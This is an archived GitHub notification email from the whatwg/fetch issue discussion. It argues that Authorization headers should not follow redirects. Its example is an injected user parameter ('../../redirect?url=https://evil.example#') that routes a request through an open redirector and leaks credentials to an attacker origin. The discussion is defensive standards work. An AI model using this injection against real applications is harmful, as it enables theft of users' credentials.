- From: arturjanc <notifications@github.com>
- Date: Sat, 25 Jan 2020 11:47:51 -0800
- To: whatwg/fetch <fetch@noreply.github.com>
- Cc: Subscribed <subscribed@noreply.github.com>
Received on Saturday, 25 January 2020 19:47:53 UTC
I think the threat model is a little different here: it's the application interpolating data into URLs of requests to which the `Authorization` header is attached.
For example, let's say my application takes the `user` parameter from the query or fragment, and then make a request to `/api/{user}/num_frombles`. An attacker will be able to set the `user` to `../../redirect?url=https://evil.example#` and make the victim's browser leak their credentials to the attacker's origin (assuming there's a redirector somewhere in the application, which is common.)
These kinds of injections happen fairly frequently because usually by themselves they aren't vulnerabilities, at least as long as the application sanitizes/validates the data it receives from the server. But in a world where `Authorization` or other headers contain secrets authenticating the user, this can become a major source of problems. It would be nice to fix this, especially if applications haven't started relying on redirected preflights yet.
@mikewest
--
You are receiving this because you are subscribed to this thread.
Reply to this email directly or view it on GitHub:
https://github.com/whatwg/fetch/issues/944#issuecomment-578437196
Received on Saturday, 25 January 2020 19:47:53 UTC